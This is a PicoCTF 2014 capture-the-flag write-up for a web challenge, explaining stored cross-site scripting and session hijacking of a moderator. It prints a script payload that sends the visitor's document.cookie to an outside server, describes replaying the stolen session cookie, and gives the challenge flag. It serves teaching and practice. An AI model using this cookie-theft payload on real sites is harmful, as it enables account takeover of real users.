PicoCTF 2014 Write-ups

secure_page_service - 100 (Web Exploitation)

Writeup by Oksisane

Created: 2014-11-08 00:54:47

Last modified: 2014-12-11 23:27:16

Problem

The bad guys have hidden their access codes on an anonymous secure page service. Our intelligence tells us that the codes was posted on a page with id 43440b22864b30a0098f034eaf940730ca211a55, but unfortunately it's protected by a password, and only site moderators can view the post without the password. Can you help us recover the codes?

Hint

What happens if you put HTML into a page?

Answer

Overview

Exploiting XSS vulnerabilities to get Admin user's session cookie.

Details

Cross-site scripting (commonly referred to as XSS) is a type of web exploit which involves an attacker being able to inject client side scripting into pages viewable by other users. First register an account and log in. Then make a simple page such as <h1>Hi</hi> which produces

Hi

. From this it is clear that secure_page_service is not filtering any html we put into a page and instead is interpreting it as normal, an XSS vulnerability! But how can we exploit this? The key here is the Report to Moderator button. We can setup a page that records the moderator's session cookie and then lure them to the page by reporting it. Once we have their session cookie we can perform a session hijacking attack (replace our session with that of the moderators), so that secure_page_service will think we are the moderator and override the password check when we browse to page 43440b22864b30a0098f034eaf940730ca211a55. So now we know what to do once we have the moderator cookie, but how do we get it?

We can form a page such as

<script>
location.href=("http://ehsandev.com/pico.php?c="+document.cookie)
</script>

When a user browses to this page they are redirected to a page on a server (in this case ehsandev.com) with their cookies in the url. The attacker can then simply view the log of the request made to the servers and copy out the session id. In this example, when we hit the report button the moderator would be redirected to http://ehsandev.com/pico.php?c=PHPSESSID=02b8t6vqgvfigv4at2ovp3e0g6 where 02b8t6vqgvfigv4at2ovp3e0g6 is the session cookie we are looking for and would appear in the logs of this site. Finally, we have to manually set the admin cookie to our PHPSESSID cookie using a Chrome extension such as EditThisCookie or a Firefox extension such as Cookies Manager+. Then, we view the page 43440b22864b30a0098f034eaf940730ca211a55 and we get our flag!

Flag

wow_cross_site_scripting_is_such_web